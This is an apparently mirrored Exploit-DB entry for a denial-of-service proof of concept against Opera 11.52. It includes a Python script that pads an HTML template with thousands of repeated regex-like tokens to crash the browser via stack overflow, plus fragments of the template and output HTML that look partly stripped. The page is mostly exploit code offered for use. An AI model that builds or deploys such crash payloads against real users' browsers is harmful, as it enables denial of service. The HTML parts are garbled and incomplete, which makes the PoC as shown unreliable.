Opera 11.52 – Stack Overflow - 体验盒子

作者： pigtail23

日期： 2011-10-20

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/18008/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

## _(<code>-')_ pigtail23 (</code>-') (<code>-')_ _ www.remoteshell.de ##

## \-.(OO ) (_).-> ( OO).->(OO ).-/(_)<-.##

## _.'\ ,-(</code>-') ,---(<code>-')/'._/ ,---. ,-(</code>-'),--. ) .----..----.##

##(_...--'' | ( OO)'.-(OO )|'--...__)| \ /<code>.\| ( OO)|(</code>-')\_,-.|\_.-,| ##

##||_.' | ||)|| .-, <code>--..--''-'|_.' | ||)||OO ) .' .'|_<##

##|.___.'(||_/ || '.(_/ ||(|.-.|(||_/(|'__ | .'/_ .-. \| ##

##||||'->|'-'||| || || ||'->| |'||\ </code>-'/ ##

##<code>--'</code>--'<code>-----' </code>--' <code>--' </code>--' <code>--' </code>-----' <code>------' </code>---''##

###################################################################################

October 20, 2011

Number two, tomorrow may the next!? 0__o

The second Opera Denial of Service PoC (Stack Overflow)

Testsystem: WinXP SP3, Win7(64 bit)

Opera version: 11.? <= 11.52

###################################################################################

poc2.html:

<html>

<body>

<html>

<body>

###################################################################################

Python script for debugging:

#!/usr/bin/python

filename = 'poc2.html'

content = open('template2.html', 'r').read()

buff = '\.]+' * 5000

rc = 300

content2 = content[:rc] + buff + content[rc:]

FILE = open(filename,"w")

FILE.write(content2)

FILE.close()

###################################################################################

template2.html:

<html>

<body>

//]]></script>

<html>

<body>